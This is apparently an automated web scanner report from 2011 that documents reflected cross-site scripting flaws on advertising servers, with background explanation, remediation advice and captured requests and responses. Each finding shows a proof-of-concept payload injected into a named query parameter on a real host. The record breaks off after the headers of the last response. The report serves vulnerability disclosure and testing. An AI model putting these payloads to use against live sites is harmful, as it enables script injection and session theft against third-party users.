Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://ad.adnetinteractive.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.adnetinteractive.com
Path: /st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd0e3"-alert(1)-"c4c905c666e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=300x250&section=1415802\&cd0e3"-alert(1)-"c4c905c666e=1 HTTP/1.1 Host: ad.adnetinteractive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:03:48 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Thu, 03 Feb 2011 19:03:48 GMT Pragma: no-cache Content-Length: 4669 Age: 0 Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.adnetinteractive.com/imp?Z=300x250&cd0e3"-alert(1)-"c4c905c666e=1&s=1415802%5c&_salt=4264763177";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array(); ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5cd8"-alert(1)-"b9616ec1409 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=a5cd8"-alert(1)-"b9616ec1409 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4862 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 18:54:01 GMT Expires: Thu, 03 Feb 2011 18:54:01 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... Ghlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=a5cd8"-alert(1)-"b9616ec1409https://insurance.lowermybills.com/auto/?sourceid=57808600-233911573-40497630"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "false"; var winW = 728; var winH ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe3a4"-alert(1)-"4f02e128fb4 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAEfe3a4"-alert(1)-"4f02e128fb4&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Thu, 03 Feb 2011 18:53:05 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4873
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... Td3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAEfe3a4"-alert(1)-"4f02e128fb4&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D57808600-233911573-40324242"); var wmode = "opaque"; va ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5975c"-alert(1)-"1d646e7eef8 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x905975c"-alert(1)-"1d646e7eef8&adurl=;ord=258545048? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Thu, 03 Feb 2011 18:53:56 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4873
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x905975c"-alert(1)-"1d646e7eef8&adurl=https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D57808600-233911573-40324242"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "false"; var win ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bbf3"-alert(1)-"7f571aed142 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=17bbf3"-alert(1)-"7f571aed142&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Thu, 03 Feb 2011 18:53:24 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4873
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... mFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=17bbf3"-alert(1)-"7f571aed142&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D57808600-233911573-40324242"); var wmode = "opaque"; var bg = ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7284c"-alert(1)-"82b821f28bc was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q7284c"-alert(1)-"82b821f28bc&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Thu, 03 Feb 2011 18:53:42 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4870
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... X2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q7284c"-alert(1)-"82b821f28bc&client=ca-accuweather-site_728x90&adurl=https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D57808600-233911573-40567083"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae9b3"-alert(1)-"8421c6bfdc2 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.135;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lae9b3"-alert(1)-"8421c6bfdc2&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5jb20vdXMvc2F0ZWxsaXRlL2VpL3VzXy9zYXRlbGxpdGUuYXNw-AEBuAIYwAIByAKLm-ERqAMB0QMIYrQRpruKOegDP-gDvAjoA4kp9QMABAAE&num=1&sig=AGiWqtxWQnkqarhWmPaKOE590oYbCpM76Q&client=ca-accuweather-site_728x90&adurl=;ord=258545048? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-accuweather-site_728x90&format=728x90_pas_abgnc&output=html&h=90&w=728&channel=ATF&ad_type=text_image&ea=0&color_bg=EEEEEE&color_border=0000FF&color_line=FFFFFF&color_url=0099FF&flash=10.1.103&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&adsafe=high&dt=1296754778543&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296754778565&frm=1&adk=377006110&ga_vid=973396829.1296754779&ga_sid=1296754779&ga_hid=783797542&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3179948421&eid=30143102&loc=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&fu=0&ifi=1&dtd=706 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Thu, 03 Feb 2011 18:52:44 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4873
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1d3/%2a/c%3B233911573%3B0-0%3B0%3B57808600%3B3454-728/90%3B40306455/40324242/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lae9b3"-alert(1)-"8421c6bfdc2&ai=BHySKRuhKTb6zIoL1lAeJ9IjIDpPAhvIBu8vR0xmzgZKkVqCNBhABGAEgjY_6BTgAUKLzptb-_____wFgyb6yiZCk0BGgAf2k--gDsgETd3d3LmFjY3V3ZWF0aGVyLmNvbboBETA3Mjh4OTBfcGFzX2FiZ25jyAEJ2gE8aHR0cDovL3d3dy5hY2N1d2VhdGhlci5j ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ab7c"-alert(1)-"ad8c3af37fd was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=3ab7c"-alert(1)-"ad8c3af37fd HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7495 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:05:07 GMT Expires: Thu, 03 Feb 2011 16:05:07 GMT
